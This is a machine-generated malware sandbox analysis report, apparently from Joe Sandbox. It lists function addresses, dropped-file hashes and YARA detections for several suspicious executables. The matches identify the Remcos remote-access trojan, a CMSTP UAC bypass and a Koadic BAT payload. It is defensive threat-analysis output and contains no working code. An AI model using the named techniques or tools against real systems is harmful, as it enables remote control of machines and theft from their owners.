Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66589D1B8	6_2_00007FF66589D1B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D31E0	6_2_00007FF6658D31E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590F168	6_2_00007FF66590F168
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659514F0	6_2_00007FF6659514F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FF520	6_2_00007FF6658FF520
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592D460	6_2_00007FF66592D460
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665885438	6_2_00007FF665885438
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658CD440	6_2_00007FF6658CD440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659794A8	6_2_00007FF6659794A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E7478	6_2_00007FF6658E7478
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A54A0	6_2_00007FF6658A54A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665939494	6_2_00007FF665939494
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659833D4	6_2_00007FF6659833D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659733D0	6_2_00007FF6659733D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FD410	6_2_00007FF6658FD410
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658873F8	6_2_00007FF6658873F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658CF434	6_2_00007FF6658CF434
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B7340	6_2_00007FF6658B7340
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AB36C	6_2_00007FF6658AB36C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596B3AC	6_2_00007FF66596B3AC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D1ED0	6_2_00007FF6658D1ED0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665909EE4	6_2_00007FF665909EE4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665915F04	6_2_00007FF665915F04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590BE70	6_2_00007FF66590BE70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590DEB0	6_2_00007FF66590DEB0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DDEA4	6_2_00007FF6658DDEA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665891DE8	6_2_00007FF665891DE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665911E2C	6_2_00007FF665911E2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B5DF7	6_2_00007FF6658B5DF7
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665937D70	6_2_00007FF665937D70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E1D70	6_2_00007FF6658E1D70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D9D6C	6_2_00007FF6658D9D6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591BDA0	6_2_00007FF66591BDA0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66598DD84	6_2_00007FF66598DD84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EC0B8	6_2_00007FF6658EC0B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B8080	6_2_00007FF6658B8080
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665952084	6_2_00007FF665952084
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665939FF8	6_2_00007FF665939FF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E8018	6_2_00007FF6658E8018
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665881F80	6_2_00007FF665881F80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E7AC8	6_2_00007FF6658E7AC8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594BB28	6_2_00007FF66594BB28
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665939A58	6_2_00007FF665939A58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FBA48	6_2_00007FF6658FBA48
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B3A40	6_2_00007FF6658B3A40
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D1A60	6_2_00007FF6658D1A60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665897AB4	6_2_00007FF665897AB4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AF9B8	6_2_00007FF6658AF9B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665881A10	6_2_00007FF665881A10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665977938	6_2_00007FF665977938
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66597994C	6_2_00007FF66597994C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659019AC	6_2_00007FF6659019AC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590F990	6_2_00007FF66590F990
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B9CD0	6_2_00007FF6658B9CD0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665949CC0	6_2_00007FF665949CC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DBCE8	6_2_00007FF6658DBCE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665895D08	6_2_00007FF665895D08
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BDD20	6_2_00007FF6658BDD20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D3C60	6_2_00007FF6658D3C60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665901C90	6_2_00007FF665901C90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66598FC90	6_2_00007FF66598FC90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66589BCA4	6_2_00007FF66589BCA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A9BC8	6_2_00007FF6658A9BC8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EDBF0	6_2_00007FF6658EDBF0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DFC34	6_2_00007FF6658DFC34
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BFC20	6_2_00007FF6658BFC20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665933C10	6_2_00007FF665933C10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665917B74	6_2_00007FF665917B74
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592FB50	6_2_00007FF66592FB50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F1B84	6_2_00007FF6658F1B84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66588FB84	6_2_00007FF66588FB84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665885BA4	6_2_00007FF665885BA4
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_028320C4	9_2_028320C4
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152CE558	9_2_152CE558
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C74E6	9_2_152C74E6
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C6FEA	9_2_152C6FEA
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C5E5E	9_2_152C5E5E
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152CDE9D	9_2_152CDE9D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C3946	9_2_152C3946
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152D61F0	9_2_152D61F0
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C78FE	9_2_152C78FE
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152CE0CC	9_2_152CE0CC
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152E332B	9_2_152E332B
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152CE2FB	9_2_152CE2FB
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152B6E0E	9_2_152B6E0E
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152B7BAF	9_2_152B7BAF
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152B739D	9_2_152B739D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152B7A46	9_2_152B7A46
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152ADB62	9_2_152ADB62
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F85554	10_2_00007FF683F85554
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F78DF8	10_2_00007FF683F78DF8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F7AA54	10_2_00007FF683F7AA54
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F837D8	10_2_00007FF683F837D8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F73410	10_2_00007FF683F73410
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F87854	10_2_00007FF683F87854
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683FA1538	10_2_00007FF683FA1538
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F9D9D0	10_2_00007FF683F9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F781D4	10_2_00007FF683F781D4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F7CE10	10_2_00007FF683F7CE10
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F84224	10_2_00007FF683F84224
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F72220	10_2_00007FF683F72220
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F9AA30	10_2_00007FF683F9AA30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F74A30	10_2_00007FF683F74A30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F75240	10_2_00007FF683F75240
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F77650	10_2_00007FF683F77650
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F7D250	10_2_00007FF683F7D250
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F79E50	10_2_00007FF683F79E50
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F80A6C	10_2_00007FF683F80A6C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F7E680	10_2_00007FF683F7E680
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F9EE88	10_2_00007FF683F9EE88
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F76EE4	10_2_00007FF683F76EE4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F97F00	10_2_00007FF683F97F00
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F7372C	10_2_00007FF683F7372C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F79B50	10_2_00007FF683F79B50
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F75B70	10_2_00007FF683F75B70
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F73F90	10_2_00007FF683F73F90
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F9AFBC	10_2_00007FF683F9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F76BE0	10_2_00007FF683F76BE0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F72C48	10_2_00007FF683F72C48
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F9AC4C	10_2_00007FF683F9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F71884	10_2_00007FF683F71884
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F818D4	10_2_00007FF683F818D4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F7B0D8	10_2_00007FF683F7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F78510	10_2_00007FF683F78510
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F77D30	10_2_00007FF683F77D30
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F85554	11_2_00007FF683F85554
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F78DF8	11_2_00007FF683F78DF8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F7AA54	11_2_00007FF683F7AA54
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F837D8	11_2_00007FF683F837D8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F73410	11_2_00007FF683F73410
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F87854	11_2_00007FF683F87854
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683FA1538	11_2_00007FF683FA1538
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F9D9D0	11_2_00007FF683F9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F781D4	11_2_00007FF683F781D4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F7CE10	11_2_00007FF683F7CE10
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F84224	11_2_00007FF683F84224
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F72220	11_2_00007FF683F72220
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F9AA30	11_2_00007FF683F9AA30
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F74A30	11_2_00007FF683F74A30
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F75240	11_2_00007FF683F75240
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F77650	11_2_00007FF683F77650
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F7D250	11_2_00007FF683F7D250
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F79E50	11_2_00007FF683F79E50
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F80A6C	11_2_00007FF683F80A6C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F7E680	11_2_00007FF683F7E680
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F9EE88	11_2_00007FF683F9EE88
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F76EE4	11_2_00007FF683F76EE4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F97F00	11_2_00007FF683F97F00
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F7372C	11_2_00007FF683F7372C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F79B50	11_2_00007FF683F79B50
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F75B70	11_2_00007FF683F75B70
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F73F90	11_2_00007FF683F73F90
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F9AFBC	11_2_00007FF683F9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F76BE0	11_2_00007FF683F76BE0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F72C48	11_2_00007FF683F72C48
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F9AC4C	11_2_00007FF683F9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F71884	11_2_00007FF683F71884
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F818D4	11_2_00007FF683F818D4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F7B0D8	11_2_00007FF683F7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F78510	11_2_00007FF683F78510
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F77D30	11_2_00007FF683F77D30
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_145874E6	24_2_145874E6
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1458E558	24_2_1458E558
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_145886E8	24_2_145886E8
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14588770	24_2_14588770
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1458E0CC	24_2_1458E0CC
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1456F0FA	24_2_1456F0FA
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_145A4159	24_2_145A4159
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14588168	24_2_14588168
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_145961F0	24_2_145961F0
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1458E2FB	24_2_1458E2FB
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_145A332B	24_2_145A332B
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1457739D	24_2_1457739D
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14587D33	24_2_14587D33
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14585E5E	24_2_14585E5E
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14576E0E	24_2_14576E0E
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1458DE9D	24_2_1458DE9D
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14563FCA	24_2_14563FCA
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14586FEA	24_2_14586FEA
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_145878FE	24_2_145878FE
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14583946	24_2_14583946
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1459D9C9	24_2_1459D9C9
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14577A46	24_2_14577A46
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1456DB62	24_2_1456DB62
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14577BAF	24_2_14577BAF
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A520C4	24_2_02A520C4

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\netutils.dll 0007FA57DA2E1DE2E487492D00B99ABAECA7E9F9CAC8A10E24EB569E19F76EE1

Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: String function: 02834824 appears 629 times
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: String function: 02834698 appears 156 times
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: String function: 02836658 appears 32 times
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: String function: 152C4E10 appears 54 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF683F8498C appears 40 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF683F8081C appears 36 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF683F83448 appears 72 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF665947BAC appears 34 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF66588D1C8 appears 41 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF665947D70 appears 35 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6659964A6 appears 173 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF66598F1B8 appears 183 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF66598F11C appears 37 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF6658BBC9C appears 280 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF665940D10 appears 181 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF66593ABFC appears 818 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF66591EB98 appears 93 times
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: String function: 14551E65 appears 34 times
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: String function: 02A544A0 appears 67 times
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: String function: 14552093 appears 50 times
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: String function: 02A54698 appears 247 times
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: String function: 02A56658 appears 32 times
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: String function: 14584E10 appears 54 times
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: String function: 02A54824 appears 883 times
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: String function: 14584770 appears 41 times
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: String function: 02A67BE8 appears 45 times

Source: netutils.dll.9.dr

Static PE information: Number of sections : 19 > 10

Source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000009.00000002.4117523372.00000000152FB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000019.00000002.2042016371.000000001447B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: sppsvc.pif PID: 3664, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Mywiztwu.PIF PID: 6548, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Mywiztwu.PIF PID: 3060, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\Public\Libraries\MywiztwuO.bat, type: DROPPED	Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload

Source: classification engine

Classification label: mal100.rans.bank.troj.spyw.expl.evad.winCMD@41/21@9/7

Source: C:\Users\Public\alpha.exe

